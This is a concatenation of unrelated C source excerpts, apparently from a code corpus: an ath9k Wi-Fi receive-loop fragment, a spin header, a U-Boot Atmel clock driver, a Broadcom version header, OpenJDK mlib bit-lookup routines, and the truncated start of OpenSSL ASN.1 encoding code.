ah->caps.rx_status_len; u64 tsf = 0; u32 tsf_lower = 0; unsigned long flags; if (edma) dma_type = DMA_BIDIRECTIONAL; else dma_type = DMA_FROM_DEVICE; qtype = hp ? ATH9K_RX_QUEUE_HP : ATH9K_RX_QUEUE_LP; spin_lock_bh(&sc->rx.rxbuflock); tsf = ath9k_hw_gettsf64(ah); tsf_lower = tsf & 0xffffffff; do { /* If handling rx interrupt and flush is in progress => exit */ if ((sc->sc_flags & SC_OP_RXFLUSH) && (flush == 0)) break; memset(&rs, 0, sizeof(rs)); if (edma) bf = ath_edma_get_next_rx_buf(sc, &rs, qtype); else bf = ath_get_next_rx_buf(sc, &rs); if (!bf) break; skb = bf->bf_mpdu; if (!skb) continue; /* * Take frame header from the first fragment and RX status from * the last one. */ if (sc->rx.frag) hdr_skb = sc->rx.frag; else hdr_skb = skb; hdr = (struct ieee80211_hdr *) (hdr_skb->data + rx_status_len); rxs = IEEE80211_SKB_RXCB(hdr_skb); if (ieee80211_is_beacon(hdr->frame_control) && !is_zero_ether_addr(common->curbssid) && !compare_ether_addr(hdr->addr3, common->curbssid)) rs.is_mybeacon = true; else rs.is_mybeacon = false; ath_debug_stat_rx(sc, &rs); /* * If we're asked to flush receive queue, directly * chain it back at the queue without processing it. */ if (sc->sc_flags & SC_OP_RXFLUSH) goto requeue_drop_frag; memset(rxs, 0, sizeof(struct ieee80211_rx_status)); rxs->mactime = (tsf & ~0xffffffffULL) | rs.rs_tstamp; if (rs.rs_tstamp > tsf_lower && unlikely(rs.rs_tstamp - tsf_lower > 0x10000000)) rxs->mactime -= 0x100000000ULL; if (rs.rs_tstamp < tsf_lower && unlikely(tsf_lower - rs.rs_tstamp > 0x10000000)) rxs->mactime += 0x100000000ULL; retval = ath9k_rx_skb_preprocess(common, hw, hdr, &rs, rxs, &decrypt_error); if (retval) goto requeue_drop_frag; /* Ensure we always have an skb to requeue once we are done * processing the current buffer's skb */ requeue_skb = ath_rxbuf_alloc(common, common->rx_bufsize, GFP_ATOMIC); /* If there is no memory we ignore the current RX'd frame, * tell hardware it can give us a new frame using the old * skb and put it at the tail of the sc->rx.rxbuf list for * processing. */ if (!requeue_skb) goto requeue_drop_frag; /* Unmap the frame */ dma_unmap_single(sc->dev, bf->bf_buf_addr, common->rx_bufsize, dma_type); skb_put(skb, rs.rs_datalen + ah->caps.rx_status_len); if (ah->caps.rx_status_len) skb_pull(skb, ah->caps.rx_status_len); if (!rs.rs_more) ath9k_rx_skb_postprocess(common, hdr_skb, &rs, rxs, decrypt_error); /* We will now give hardware our shiny new allocated skb */ bf->bf_mpdu = requeue_skb; bf->bf_buf_addr = dma_map_single(sc->dev, requeue_skb->data, common->rx_bufsize, dma_type); if (unlikely(dma_mapping_error(sc->dev, bf->bf_buf_addr))) { dev_kfree_skb_any(requeue_skb); bf->bf_mpdu = NULL; bf->bf_buf_addr = 0; ath_err(common, "dma_mapping_error() on RX\n"); ieee80211_rx(hw, skb); break; } if (rs.rs_more) { /* * rs_more indicates chained descriptors which can be * used to link buffers together for a sort of * scatter-gather operation. */ if (sc->rx.frag) { /* too many fragments - cannot handle frame */ dev_kfree_skb_any(sc->rx.frag); dev_kfree_skb_any(skb); skb = NULL; } sc->rx.frag = skb; goto requeue; } if (sc->rx.frag) { int space = skb->len - skb_tailroom(hdr_skb); if (pskb_expand_head(hdr_skb, 0, space, GFP_ATOMIC) < 0) { dev_kfree_skb(skb); goto requeue_drop_frag; } sc->rx.frag = NULL; skb_copy_from_linear_data(skb, skb_put(hdr_skb, skb->len), skb->len); dev_kfree_skb_any(skb); skb = hdr_skb; } if (ah->caps.hw_caps & ATH9K_HW_CAP_ANT_DIV_COMB) { /* * change the default rx antenna if rx diversity * chooses the other antenna 3 times in a row. */ if (sc->rx.defant != rs.rs_antenna) { if (++sc->rx.rxotherant >= 3) ath_setdefantenna(sc, rs.rs_antenna); } else { sc->rx.rxotherant = 0; } } if (rxs->flag & RX_FLAG_MMIC_STRIPPED) skb_trim(skb, skb->len - 8); spin_lock_irqsave(&sc->sc_pm_lock, flags); if ((sc->ps_flags & (PS_WAIT_FOR_BEACON | PS_WAIT_FOR_CAB | PS_WAIT_FOR_PSPOLL_DATA)) || ath9k_check_auto_sleep(sc)) ath_rx_ps(sc, skb, rs.is_mybeacon); spin_unlock_irqrestore(&sc->sc_pm_lock, flags); if ((ah->caps.hw_caps & ATH9K_HW_CAP_ANT_DIV_COMB) && sc->ant_rx == 3) ath_ant_comb_scan(sc, &rs); ieee80211_rx(hw, skb); requeue_drop_frag: if (sc->rx.frag) { dev_kfree_skb_any(sc->rx.frag); sc->rx.frag = NULL; } requeue: if (edma) { list_add_tail(&bf->list, &sc->rx.rxbuf); ath_rx_edma_buf_link(sc, qtype); } else { list_move_tail(&bf->list, &sc->rx.rxbuf); ath_rx_buf_link(sc, bf); if (!flush) ath9k_hw_rxena(ah); } } while (1); spin_unlock_bh(&sc->rx.rxbuflock); if (!(ah->imask & ATH9K_INT_RXEOL)) { ah->imask |= (ATH9K_INT_RXEOL | ATH9K_INT_RXORN); ath9k_hw_set_interrupts(ah); } return 0; }
{ "language": "C" }
#ifndef ARBITRARY_SPIN_H__ #define ARBITRARY_SPIN_H__ #include <math.h> #include "quat.h" #define NRANDOM_ORIENTATIONS 20 #define NRANDOM_SPINS 20 extern union quat random_orientation[NRANDOM_ORIENTATIONS]; extern union quat random_spin[NRANDOM_SPINS]; extern void initialize_random_orientations_and_spins(int mtwist_seed); extern void compute_arbitrary_spin(float frame_rate_hz, double timestamp, union quat *orientation, union quat *rotational_velocity); #endif
{ "language": "C" }
/* * Copyright (C) 2016 Atmel Corporation * Wenyou.Yang <wenyou.yang@atmel.com> * * SPDX-License-Identifier: GPL-2.0+ */ #include <common.h> #include <clk-uclass.h> #include <dm.h> #include <dm/lists.h> #include <dm/util.h> #include "pmc.h" DECLARE_GLOBAL_DATA_PTR; static const struct udevice_id at91_pmc_match[] = { { .compatible = "atmel,at91rm9200-pmc" }, { .compatible = "atmel,at91sam9260-pmc" }, { .compatible = "atmel,at91sam9g45-pmc" }, { .compatible = "atmel,at91sam9n12-pmc" }, { .compatible = "atmel,at91sam9x5-pmc" }, { .compatible = "atmel,sama5d3-pmc" }, { .compatible = "atmel,sama5d2-pmc" }, {} }; U_BOOT_DRIVER(at91_pmc) = { .name = "at91-pmc", .id = UCLASS_SIMPLE_BUS, .of_match = at91_pmc_match, }; /*---------------------------------------------------------*/ int at91_pmc_core_probe(struct udevice *dev) { struct pmc_platdata *plat = dev_get_platdata(dev); dev = dev_get_parent(dev); plat->reg_base = (struct at91_pmc *)devfdt_get_addr_ptr(dev); return 0; } /** * at91_clk_sub_device_bind() - for the at91 clock driver * Recursively bind its children as clk devices. * * @return: 0 on success, or negative error code on failure */ int at91_clk_sub_device_bind(struct udevice *dev, const char *drv_name) { const void *fdt = gd->fdt_blob; int offset = dev_of_offset(dev); bool pre_reloc_only = !(gd->flags & GD_FLG_RELOC); const char *name; int ret; for (offset = fdt_first_subnode(fdt, offset); offset > 0; offset = fdt_next_subnode(fdt, offset)) { if (pre_reloc_only && !dm_fdt_pre_reloc(fdt, offset)) continue; /* * If this node has "compatible" property, this is not * a clock sub-node, but a normal device. skip. */ fdt_get_property(fdt, offset, "compatible", &ret); if (ret >= 0) continue; if (ret != -FDT_ERR_NOTFOUND) return ret; name = fdt_get_name(fdt, offset, NULL); if (!name) return -EINVAL; ret = device_bind_driver_to_node(dev, drv_name, name, offset_to_ofnode(offset), NULL); if (ret) return ret; } return 0; } int at91_clk_of_xlate(struct clk *clk, struct ofnode_phandle_args *args) { int periph; if (args->args_count) { debug("Invalid args_count: %d\n", args->args_count); return -EINVAL; } periph = fdtdec_get_uint(gd->fdt_blob, dev_of_offset(clk->dev), "reg", -1); if (periph < 0) return -EINVAL; clk->id = periph; return 0; } int at91_clk_probe(struct udevice *dev) { struct udevice *dev_periph_container, *dev_pmc; struct pmc_platdata *plat = dev_get_platdata(dev); dev_periph_container = dev_get_parent(dev); dev_pmc = dev_get_parent(dev_periph_container); plat->reg_base = (struct at91_pmc *)devfdt_get_addr_ptr(dev_pmc); return 0; }
{ "language": "C" }
/* * Copyright (C) 1999-2012, Broadcom Corporation * * Unless you and Broadcom execute a separate written software license * agreement governing use of this software, this software is licensed to you * under the terms of the GNU General Public License version 2 (the "GPL"), * available at http://www.broadcom.com/licenses/GPLv2.php, with the * following added to such license: * * As a special exception, the copyright holders of this software give you * permission to link this software with independent modules, and to copy and * distribute the resulting executable under terms of your choice, provided that * you also meet, for each linked independent module, the terms and conditions of * the license of that module. An independent module is a module which is not * derived from this software. The special exception does not apply to any * modifications of the software. * * Notwithstanding the above, under no circumstances may you combine this * software in any way with any other Broadcom software provided under a license * other than the GPL, without Broadcom's express prior written consent. * * $Id: epivers.h.in,v 13.33 2010-09-08 22:08:53 $ * */ #ifndef _epivers_h_ #define _epivers_h_ #define EPI_MAJOR_VERSION 1 #define EPI_MINOR_VERSION 27 #define EPI_RC_NUMBER 0 #define EPI_INCREMENTAL_NUMBER 0 #define EPI_BUILD_NUMBER 0 #define EPI_VERSION 1, 27, 0, 0 #define EPI_VERSION_NUM 0x011b0000 #define EPI_VERSION_DEV 1.27.0 #define EPI_VERSION_STR "1.27 (r329705)" #endif
{ "language": "C" }
/* * Copyright (c) 2003, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ /* * FUNCTION * mlib_ImageLookUp_Bit_U8 - table lookup * * SYNOPSIS * void mlib_ImageLookUp_Bit_U8(src, slb, * dst, dlb, * xsize, ysize, * csize, table) * * ARGUMENT * src pointer to input image (BIT) * slb stride of input image (in pixels) * dst pointer to output image (BYTE) * dlb stride of output image (in pixels) * xsize image width * ysize image height * csize number of channels * table lookup table * * DESCRIPTION * dst = table[src] (c, vis version) */ #include "mlib_image.h" #include "mlib_ImageLookUp.h" /***************************************************************/ #define MAX_WIDTH 512 /***************************************************************/ #ifdef i386 /* do not copy by double data type for x86 */ typedef struct { mlib_u32 int0, int1; } two_uint; #define TYPE_64BIT two_uint #define TYPE_32BIT mlib_u32 #define DTYPE two_uint #elif defined(_NO_LONGLONG) #define TYPE_64BIT mlib_d64 #define TYPE_32BIT mlib_f32 #define DTYPE mlib_d64 #else #define TYPE_64BIT mlib_d64 #define TYPE_32BIT mlib_f32 #define DTYPE mlib_u64 #endif /* i386 ( do not copy by double data type for x86 ) */ /***************************************************************/ typedef union { TYPE_64BIT d64; struct { TYPE_32BIT f0, f1; } f32s; } d64_2_f32; /***************************************************************/ #ifdef _LITTLE_ENDIAN static const mlib_u32 mlib_bit_mask[16] = { 0x00000000u, 0xFF000000u, 0x00FF0000u, 0xFFFF0000u, 0x0000FF00u, 0xFF00FF00u, 0x00FFFF00u, 0xFFFFFF00u, 0x000000FFu, 0xFF0000FFu, 0x00FF00FFu, 0xFFFF00FFu, 0x0000FFFFu, 0xFF00FFFFu, 0x00FFFFFFu, 0xFFFFFFFFu }; static const mlib_u32 mlib_bit_mask_2[4] = { 0x00000000u, 0xFFFF0000u, 0x0000FFFFu, 0xFFFFFFFFu }; static const mlib_u32 mlib_bit_mask_3[3*4] = { 0x00000000u, 0xFF000000u, 0x00FFFFFFu, 0xFFFFFFFFu, 0x00000000u, 0xFFFF0000u, 0x0000FFFFu, 0xFFFFFFFFu, 0x00000000u, 0xFFFFFF00u, 0x000000FFu, 0xFFFFFFFFu }; #else static const mlib_u32 mlib_bit_mask[16] = { 0x00000000u, 0x000000FFu, 0x0000FF00u, 0x0000FFFFu, 0x00FF0000u, 0x00FF00FFu, 0x00FFFF00u, 0x00FFFFFFu, 0xFF000000u, 0xFF0000FFu, 0xFF00FF00u, 0xFF00FFFFu, 0xFFFF0000u, 0xFFFF00FFu, 0xFFFFFF00u, 0xFFFFFFFFu }; static const mlib_u32 mlib_bit_mask_2[4] = { 0x00000000u, 0x0000FFFFu, 0xFFFF0000u, 0xFFFFFFFFu }; static const mlib_u32 mlib_bit_mask_3[3*4] = { 0x00000000u, 0x000000FFu, 0xFFFFFF00u, 0xFFFFFFFFu, 0x00000000u, 0x0000FFFFu, 0xFFFF0000u, 0xFFFFFFFFu, 0x00000000u, 0x00FFFFFFu, 0xFF000000u, 0xFFFFFFFFu }; #endif /* _LITTLE_ENDIAN */ /***************************************************************/ mlib_status mlib_ImageLookUp_Bit_U8_1(const mlib_u8 *src, mlib_s32 slb, mlib_u8 *dst, mlib_s32 dlb, mlib_s32 xsize, mlib_s32 ysize, mlib_s32 nchan, mlib_s32 bitoff, const mlib_u8 **table) { mlib_s32 i, j, n; TYPE_64BIT dd_array[256]; mlib_u8 buff_lcl[MAX_WIDTH/8]; mlib_u8 *buff = (mlib_u8*)buff_lcl; mlib_u32 val0, val1, *p_dd = (mlib_u32*)dd_array; if (xsize > MAX_WIDTH) { buff = mlib_malloc((xsize + 7)/8); if (buff == NULL) return MLIB_FAILURE; } val0 = table[0][0]; val1 = table[0][1]; val0 |= (val0 << 8); val1 |= (val1 << 8); val0 |= (val0 << 16); val1 |= (val1 << 16); /* calculate lookup table */ for (i = 0; i < 16; i++) { mlib_u32 v, mask = mlib_bit_mask[i]; v = (val0 &~ mask) | (val1 & mask); #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (j = 0; j < 16; j++) { p_dd[2*(16*i + j)] = v; } #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (j = 0; j < 16; j++) { p_dd[2*(i + 16*j) + 1] = v; } } for (j = 0; j < ysize; j++) { mlib_s32 s0, size = xsize; mlib_u8 *dp = dst; mlib_u8 *sp = (void *)src; mlib_u8 *sa; TYPE_64BIT *da; mlib_s32 doff, boff = bitoff; if ((mlib_addr)dp & 7) { /* result of (dp & 7) certainly fits into mlib_s32 */ doff = 8 - ((mlib_s32) ((mlib_addr)dp & 7)); if (doff > xsize) doff = xsize; for (n = 0; n < doff; n++) { dp[n] = table[0][(sp[0] >> (7 - boff)) & 0x1]; boff++; if (boff >= 8) { sp++; boff -= 8; } size--; } dp += doff; } if (boff) { mlib_ImageCopy_bit_na(sp, buff, size, boff, 0); sp = buff; } sa = (mlib_u8*)sp; da = (TYPE_64BIT*)dp; i = 0; if ((mlib_addr)sa & 1 && size >= 8) { *da++ = dd_array[*sa++]; i += 8; } #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (; i <= (size - 16); i += 16) { s0 = *(mlib_u16*)sa; #ifdef _LITTLE_ENDIAN *da++ = dd_array[s0 & 0xFF]; *da++ = dd_array[s0 >> 8]; #else *da++ = dd_array[s0 >> 8]; *da++ = dd_array[s0 & 0xFF]; #endif /* _LITTLE_ENDIAN */ sa += 2; } if (i <= (size - 8)) { *da++ = dd_array[*sa++]; i += 8; } if (i < size) { #ifdef _NO_LONGLONG mlib_u32 emask; val0 = sa[0]; val1 = p_dd[2*val0]; if (i < (size - 4)) { ((mlib_u32*)da)[0] = val1; da = (TYPE_64BIT *) ((mlib_u8 *)da + 4); i += 4; val1 = p_dd[2*val0+1]; } #ifdef _LITTLE_ENDIAN emask = (mlib_u32)((mlib_s32)(-1)) >> ((4 - (size - i)) * 8); #else emask = (mlib_s32)(-1) << ((4 - (size - i)) * 8); #endif /* _LITTLE_ENDIAN */ ((mlib_u32*)da)[0] = (val1 & emask) | (((mlib_u32*)da)[0] &~ emask); #else /* _NO_LONGLONG */ #ifdef _LITTLE_ENDIAN mlib_u64 emask = (mlib_u64)((mlib_s64)(-1)) >> ((8 - (size - i)) * 8); #else mlib_u64 emask = (mlib_s64)(-1) << ((8 - (size - i)) * 8); #endif /* _LITTLE_ENDIAN */ ((mlib_u64*)da)[0] = (((mlib_u64*)dd_array)[sa[0]] & emask) | (((mlib_u64*)da)[0] &~ emask); #endif /* _NO_LONGLONG */ } src += slb; dst += dlb; } if (buff != (mlib_u8*)buff_lcl) mlib_free(buff); return MLIB_SUCCESS; } /***************************************************************/ mlib_status mlib_ImageLookUp_Bit_U8_2(const mlib_u8 *src, mlib_s32 slb, mlib_u8 *dst, mlib_s32 dlb, mlib_s32 xsize, mlib_s32 ysize, mlib_s32 nchan, mlib_s32 bitoff, const mlib_u8 **table) { mlib_s32 i, j; mlib_s32 s0, size; #ifdef _NO_LONGLONG mlib_u32 emask, dd1, dd2; #else /* _NO_LONGLONG */ mlib_u64 emask, dd; #endif /* _NO_LONGLONG */ DTYPE dd_array[16]; mlib_u32 *p_dd = (mlib_u32*)dd_array; mlib_d64 buff_lcl[(MAX_WIDTH + MAX_WIDTH/8)/8]; mlib_u8 *buff = (mlib_u8*)buff_lcl, *buffs; mlib_u32 val0, val1; size = xsize * 2; if (size > MAX_WIDTH) { buff = mlib_malloc(size + (size + 7)/8); if (buff == NULL) return MLIB_FAILURE; } buffs = buff + size; val0 = table[0][0]; val1 = table[0][1]; #ifdef _LITTLE_ENDIAN val0 = val0 | (table[1][0] << 8); val1 = val1 | (table[1][1] << 8); #else val0 = (val0 << 8) | table[1][0]; val1 = (val1 << 8) | table[1][1]; #endif /* _LITTLE_ENDIAN */ val0 |= (val0 << 16); val1 |= (val1 << 16); /* calculate lookup table */ for (i = 0; i < 4; i++) { mlib_u32 v, mask = mlib_bit_mask_2[i]; v = (val0 &~ mask) | (val1 & mask); for (j = 0; j < 4; j++) { p_dd[2*(4*i + j)] = v; p_dd[2*(i + 4*j) + 1] = v; } } for (j = 0; j < ysize; j++) { mlib_u8 *dp = dst; mlib_u8 *sp = (void *)src; mlib_u8 *sa; DTYPE *da; if ((mlib_addr)dp & 7) dp = buff; if (bitoff) { mlib_ImageCopy_bit_na(sp, buffs, size, bitoff, 0); sp = buffs; } sa = (mlib_u8*)sp; da = (DTYPE*)dp; #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (i = 0; i <= (size - 16); i += 16) { s0 = *sa++; *da++ = dd_array[s0 >> 4]; *da++ = dd_array[s0 & 0xF]; } if (i < size) { s0 = *sa++; #ifdef _NO_LONGLONG dd1 = p_dd[2*(s0 >> 4)]; dd2 = p_dd[2*(s0 >> 4)+1]; if (i < (size - 8)) { ((mlib_u32*)da)[0] = dd1; ((mlib_u32*)da)[1] = dd2; da++; i += 8; dd1 = p_dd[2*(s0 & 0xf)]; dd2 = p_dd[2*(s0 & 0xf)+1]; } if (i < (size - 4)) { ((mlib_u32*)da)[0] = dd1; da = (DTYPE *) ((mlib_u8 *)da + 4); i += 4; dd1 = dd2; } #ifdef _LITTLE_ENDIAN emask = (mlib_u32)((mlib_s32)(-1)) >> ((4 - (size - i)) * 8); #else emask = (mlib_s32)(-1) << ((4 - (size - i)) * 8); #endif /* _LITTLE_ENDIAN */ ((mlib_u32*)da)[0] = (dd1 & emask) | (((mlib_u32*)da)[0] &~ emask); #else /* _NO_LONGLONG */ dd = ((mlib_u64*)dd_array)[s0 >> 4]; if (i < (size - 8)) { ((mlib_u64*)da)[0] = dd; da++; i += 8; dd = ((mlib_u64*)dd_array)[s0 & 0xf]; } #ifdef _LITTLE_ENDIAN emask = (mlib_u64)((mlib_s64)(-1)) >> ((8 - (size - i)) * 8); #else emask = (mlib_s64)(-1) << ((8 - (size - i)) * 8); #endif /* _LITTLE_ENDIAN */ ((mlib_u64*)da)[0] = (dd & emask) | (((mlib_u64*)da)[0] &~ emask); #endif /* _NO_LONGLONG */ } if (dp != dst) mlib_ImageCopy_na(dp, dst, size); src += slb; dst += dlb; } if (buff != (mlib_u8*)buff_lcl) mlib_free(buff); return MLIB_SUCCESS; } /***************************************************************/ mlib_status mlib_ImageLookUp_Bit_U8_3(const mlib_u8 *src, mlib_s32 slb, mlib_u8 *dst, mlib_s32 dlb, mlib_s32 xsize, mlib_s32 ysize, mlib_s32 nchan, mlib_s32 bitoff, const mlib_u8 **table) { mlib_s32 i, j; mlib_s32 s0, size; mlib_u32 emask, dd; TYPE_64BIT d_array01[16], d_array12[16]; TYPE_64BIT buff_lcl[(MAX_WIDTH + MAX_WIDTH/8)/8]; mlib_u8 *buff = (mlib_u8*)buff_lcl, *buffs; mlib_u32 l0, h0, v0, l1, h1, v1, l2, h2, v2; size = 3 * xsize; if (size > MAX_WIDTH) { buff = mlib_malloc(size + (size + 7)/8); if (buff == NULL) return MLIB_FAILURE; } buffs = buff + size; #ifdef _LITTLE_ENDIAN l0 = (table[0][0] << 24) | (table[2][0] << 16) | (table[1][0] << 8) | (table[0][0]); h0 = (table[0][1] << 24) | (table[2][1] << 16) | (table[1][1] << 8) | (table[0][1]); l1 = (l0 >> 8); l1 |= (l1 << 24); h1 = (h0 >> 8); h1 |= (h1 << 24); l2 = (l1 >> 8); l2 |= (l2 << 24); h2 = (h1 >> 8); h2 |= (h2 << 24); #else l0 = (table[0][0] << 24) | (table[1][0] << 16) | (table[2][0] << 8) | (table[0][0]); h0 = (table[0][1] << 24) | (table[1][1] << 16) | (table[2][1] << 8) | (table[0][1]); l1 = (l0 << 8); l1 |= (l1 >> 24); h1 = (h0 << 8); h1 |= (h1 >> 24); l2 = (l1 << 8); l2 |= (l2 >> 24); h2 = (h1 << 8); h2 |= (h2 >> 24); #endif /* _LITTLE_ENDIAN */ /* calculate lookup table */ #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (i = 0; i < 16; i++) { mlib_u32 mask0 = mlib_bit_mask_3[i >> 2]; mlib_u32 mask1 = mlib_bit_mask_3[4 + ((i >> 1) & 3)]; mlib_u32 mask2 = mlib_bit_mask_3[8 + (i & 3)]; v0 = (l0 &~ mask0) | (h0 & mask0); v1 = (l1 &~ mask1) | (h1 & mask1); v2 = (l2 &~ mask2) | (h2 & mask2); ((mlib_u32*)d_array01)[2*i ] = v0; ((mlib_u32*)d_array01)[2*i + 1] = v1; ((mlib_u32*)d_array12)[2*i ] = v1; ((mlib_u32*)d_array12)[2*i + 1] = v2; } for (j = 0; j < ysize; j++) { mlib_u8 *dp = dst; mlib_u8 *sp = (void *)src; mlib_u8 *sa; mlib_u32 *da; if ((mlib_addr)dp & 7) dp = buff; if (bitoff) { mlib_ImageCopy_bit_na(sp, buffs, size, bitoff, 0); sp = buffs; } sa = (mlib_u8*)sp; da = (mlib_u32*)dp; #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (i = 0; i <= (size - 24); i += 24) { d64_2_f32 dd; s0 = *sa++; ((TYPE_64BIT*)da)[0] = *(d_array01 + (s0 >> 4)); dd.f32s.f0 = ((TYPE_32BIT*)(d_array12 + (s0 >> 4)))[1]; dd.f32s.f1 = ((TYPE_32BIT*)(d_array01 + (s0 & 0xF)))[0]; ((TYPE_64BIT*)da)[1] = dd.d64; ((TYPE_64BIT*)da)[2] = *(d_array12 + (s0 & 0xF)); da += 6; } if (i < size) { s0 = *sa++; dd = ((mlib_u32*)(d_array01 + (s0 >> 4)))[0]; if (i < (size - 4)) { *da++ = dd; i += 4; dd = ((mlib_u32*)(d_array12 + (s0 >> 4)))[0]; } if (i < (size - 4)) { *da++ = dd; i += 4; dd = ((mlib_u32*)(d_array12 + (s0 >> 4)))[1]; } if (i < (size - 4)) { *da++ = dd; i += 4; dd = ((mlib_u32*)(d_array01 + (s0 & 0xF)))[0]; } if (i < (size - 4)) { *da++ = dd; i += 4; dd = ((mlib_u32*)(d_array12 + (s0 & 0xF)))[0]; } if (i < (size - 4)) { *da++ = dd; i += 4; dd = ((mlib_u32*)(d_array12 + (s0 & 0xF)))[1]; } #ifdef _LITTLE_ENDIAN emask = (mlib_u32)((mlib_s32)(-1)) >> ((4 - (size - i)) * 8); #else emask = (mlib_s32)(-1) << ((4 - (size - i)) * 8); #endif /* _LITTLE_ENDIAN */ da[0] = (dd & emask) | (da[0] &~ emask); } if (dp != dst) mlib_ImageCopy_na(dp, dst, size); src += slb; dst += dlb; } if (buff != (mlib_u8*)buff_lcl) mlib_free(buff); return MLIB_SUCCESS; } /***************************************************************/ mlib_status mlib_ImageLookUp_Bit_U8_4(const mlib_u8 *src, mlib_s32 slb, mlib_u8 *dst, mlib_s32 dlb, mlib_s32 xsize, mlib_s32 ysize, mlib_s32 nchan, mlib_s32 bitoff, const mlib_u8 **table) { mlib_s32 i, j; mlib_s32 s0, size; DTYPE dd_array0[16], dd_array1[16], lh[4], dd; mlib_d64 buff_lcl[(MAX_WIDTH + MAX_WIDTH/8)/8]; mlib_u8 *buff = (mlib_u8*)buff_lcl, *buffs; mlib_u32 l, h; size = xsize * 4; if (size > MAX_WIDTH) { buff = mlib_malloc(size + (size + 7)/8); if (buff == NULL) return MLIB_FAILURE; } buffs = buff + size; #ifdef _LITTLE_ENDIAN l = (table[3][0] << 24) | (table[2][0] << 16) | (table[1][0] << 8) | (table[0][0]); h = (table[3][1] << 24) | (table[2][1] << 16) | (table[1][1] << 8) | (table[0][1]); #else l = (table[0][0] << 24) | (table[1][0] << 16) | (table[2][0] << 8) | (table[3][0]); h = (table[0][1] << 24) | (table[1][1] << 16) | (table[2][1] << 8) | (table[3][1]); #endif /* _LITTLE_ENDIAN */ ((mlib_u32*)lh)[0] = l; ((mlib_u32*)lh)[1] = l; ((mlib_u32*)lh)[2] = l; ((mlib_u32*)lh)[3] = h; ((mlib_u32*)lh)[4] = h; ((mlib_u32*)lh)[5] = l; ((mlib_u32*)lh)[6] = h; ((mlib_u32*)lh)[7] = h; /* calculate lookup table */ dd_array0[ 0] = lh[0]; dd_array1[ 0] = lh[0]; dd_array0[ 1] = lh[0]; dd_array1[ 1] = lh[1]; dd_array0[ 2] = lh[0]; dd_array1[ 2] = lh[2]; dd_array0[ 3] = lh[0]; dd_array1[ 3] = lh[3]; dd_array0[ 4] = lh[1]; dd_array1[ 4] = lh[0]; dd_array0[ 5] = lh[1]; dd_array1[ 5] = lh[1]; dd_array0[ 6] = lh[1]; dd_array1[ 6] = lh[2]; dd_array0[ 7] = lh[1]; dd_array1[ 7] = lh[3]; dd_array0[ 8] = lh[2]; dd_array1[ 8] = lh[0]; dd_array0[ 9] = lh[2]; dd_array1[ 9] = lh[1]; dd_array0[10] = lh[2]; dd_array1[10] = lh[2]; dd_array0[11] = lh[2]; dd_array1[11] = lh[3]; dd_array0[12] = lh[3]; dd_array1[12] = lh[0]; dd_array0[13] = lh[3]; dd_array1[13] = lh[1]; dd_array0[14] = lh[3]; dd_array1[14] = lh[2]; dd_array0[15] = lh[3]; dd_array1[15] = lh[3]; for (j = 0; j < ysize; j++) { mlib_u8 *dp = dst; mlib_u8 *sp = (void *)src; mlib_u8 *sa; DTYPE *da; if ((mlib_addr)dp & 7) dp = buff; if (bitoff) { mlib_ImageCopy_bit_na(sp, buffs, size, bitoff, 0); sp = buffs; } sa = (mlib_u8*)sp; da = (DTYPE*)dp; #ifdef __SUNPRO_C #pragma pipeloop(0) #endif /* __SUNPRO_C */ for (i = 0; i <= (size - 32); i += 32) { s0 = *sa++; *da++ = dd_array0[s0 >> 4]; *da++ = dd_array1[s0 >> 4]; *da++ = dd_array0[s0 & 0xF]; *da++ = dd_array1[s0 & 0xF]; } if (i < size) { s0 = *sa++; dd = dd_array0[s0 >> 4]; if (i <= (size - 8)) { *da++ = dd; i += 8; dd = dd_array1[s0 >> 4]; } if (i <= (size - 8)) { *da++ = dd; i += 8; dd = dd_array0[s0 & 0xF]; } if (i <= (size - 8)) { *da++ = dd; i += 8; dd = dd_array1[s0 & 0xF]; } if (i < size) { *(mlib_u32*)da = *(mlib_u32*) & dd; } } if (dp != dst) mlib_ImageCopy_na(dp, dst, size); src += slb; dst += dlb; } if (buff != (mlib_u8*)buff_lcl) mlib_free(buff); return MLIB_SUCCESS; } /***************************************************************/
{ "language": "C" }
/* * Copyright 2000-2018 The OpenSSL Project Authors. All Rights Reserved. * * Licensed under the OpenSSL license (the "License"). You may not use * this file except in compliance with the License. You can obtain a copy * in the file LICENSE in the source distribution or at * https://www.openssl.org/source/license.html */ #include <stddef.h> #include <string.h> #include "internal/cryptlib.h" #include <openssl/asn1.h> #include <openssl/asn1t.h> #include <openssl/objects.h> #include "internal/asn1_int.h" #include "asn1_locl.h" static int asn1_i2d_ex_primitive(ASN1_VALUE **pval, unsigned char **out, const ASN1_ITEM *it, int tag, int aclass); static int asn1_set_seq_out(STACK_OF(ASN1_VALUE) *sk, unsigned char **out, int skcontlen, const ASN1_ITEM *item, int do_sort, int iclass); static int asn1_template_ex_i2d(ASN1_VALUE **pval, unsigned char **out, const ASN1_TEMPLATE *tt, int tag, int aclass); static int asn1_item_flags_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it, int flags); static int asn1_ex_i2c(ASN1_VALUE **pval, unsigned char *cout, int *putype, const ASN1_ITEM *it); /* * Top level i2d equivalents: the 'ndef' variant instructs the encoder to use * indefinite length constructed encoding, where appropriate */ int ASN1_item_ndef_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it) { return asn1_item_flags_i2d(val, out, it, 